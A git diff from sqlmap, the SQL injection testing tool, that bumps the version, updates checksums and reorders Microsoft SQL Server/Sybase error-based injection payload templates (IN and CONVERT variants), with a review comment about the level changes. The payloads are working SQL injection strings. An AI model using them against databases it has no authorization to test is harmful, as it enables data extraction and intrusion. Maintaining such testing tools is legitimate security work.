diff --git a/lib/core/settings.py b/lib/core/settings.py
index 47bbebd0e..77de16278 100644
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@@ -20,7 +20,7 @@ from lib.core.enums import OS
 from lib.core.revision import getRevisionNumber
 # sqlmap version (...)
-VERSION = "1.0.10.17"
+VERSION = "1.0.10.18"
 REVISION = getRevisionNumber()
 TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable"
 TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34}
diff --git a/txt/checksum.md5 b/txt/checksum.md5
index 35c32efff..dbda433ea 100644
--- a/txt/checksum.md5
+++ b/txt/checksum.md5
@@ -45,7 +45,7 @@ e60456db5380840a586654344003d4e6 lib/core/readlineng.py
 5ef56abb8671c2ca6ceecb208258e360 lib/core/replication.py
 99a2b496b9d5b546b335653ca801153f lib/core/revision.py
 7c15dd2777af4dac2c89cab6df17462e lib/core/session.py
-03d99f9c043a47cb17f5a7b1fe053422 lib/core/settings.py
+0537c742c135be19c8264e2e11f2ce6c lib/core/settings.py
 7af83e4f18cab6dff5e67840eb65be80 lib/core/shell.py
 23657cd7d924e3c6d225719865855827 lib/core/subprocessng.py
 c3ace7874a536d801f308cf1fd03df99 lib/core/target.py
@@ -449,7 +449,7 @@ fb93505ef0ab3b4a20900f3e5625260d xml/boundaries.xml
 535d625cff8418bdc086ab4e1bbf5135 xml/errors.xml
 a279656ea3fcb85c727249b02f828383 xml/livetests.xml
 14a2abeb88b00ab489359d0dd7a3017f xml/payloads/boolean_blind.xml
-c136d8d2be59394e9221e2b732522d06 xml/payloads/error_based.xml
+a9fdde4fda738a678ad2fa9fb718e833 xml/payloads/error_based.xml
 06b1a210b190d52477a9d492443725b5 xml/payloads/inline_query.xml
 3194e2688a7576e1f877d5b137f7c260 xml/payloads/stacked_queries.xml
 c2d8dd03db5a663e79eabb4495dd0723 xml/payloads/time_blind.xml
diff --git a/xml/payloads/error_based.xml b/xml/payloads/error_based.xml
index 806ab82a6..6de3dc7dc 100644
--- a/xml/payloads/error_based.xml
+++ b/xml/payloads/error_based.xml
@@ -388,12 +388,54 @@ - Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) 2 1 1 1,9 1 + AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ + + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) + 2 + 2 + 3 + 1,9 + 2 + OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) + + OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) + + + [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] + +
+ Microsoft SQL Server + Sybase + Windows +
+
+ + + Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (CONVERT) + 2 + 2 + 1 + 1,9 + 1 AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) @@ -409,9 +451,9 @@ - Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause + Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (CONVERT) 2 - 1 + 3 3 1,9 2 @@ -471,48 +513,6 @@ - - Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN) - 2 - 2 - 1 - 1,9 - 1 - AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
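Review bot: The level changes on the Microsoft SQL Server/Sybase error-based tests are not explained anywhere in the file: in the first hunk the new `(IN)` AND test takes over the level-1 slot while the `(CONVERT)` AND test appears to move to level 2, and the second hunk (`@@ -409,9 +451,9 @@`) raises the `(CONVERT)` OR test from 1 to 3. Element names are stripped in this view, so those fields are read by position and should be confirmed against the file. If that reading is right, a run at the lowest level now emits the `IN ((...))` form rather than `CONVERT(INT,...)`, which matters to anyone keeping WAF or IDS signatures or regression fixtures keyed on the previous default. I would add an XML comment above the first `(IN)` test, for example `<!-- IN variant is the level-1 default; CONVERT variants run at level 2 (AND) and 3 (OR): REASON -->`, with the reason filled in by the author.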
- Microsoft SQL Server - Sybase - Windows -
-
- - - Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN) - 2 - 2 - 3 - 1,9 - 2 - OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')) - - OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')) - - - [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP] - -
- Microsoft SQL Server - Sybase - Windows -
-
- Oracle AND error-based - WHERE or HAVING clause (XMLType) 2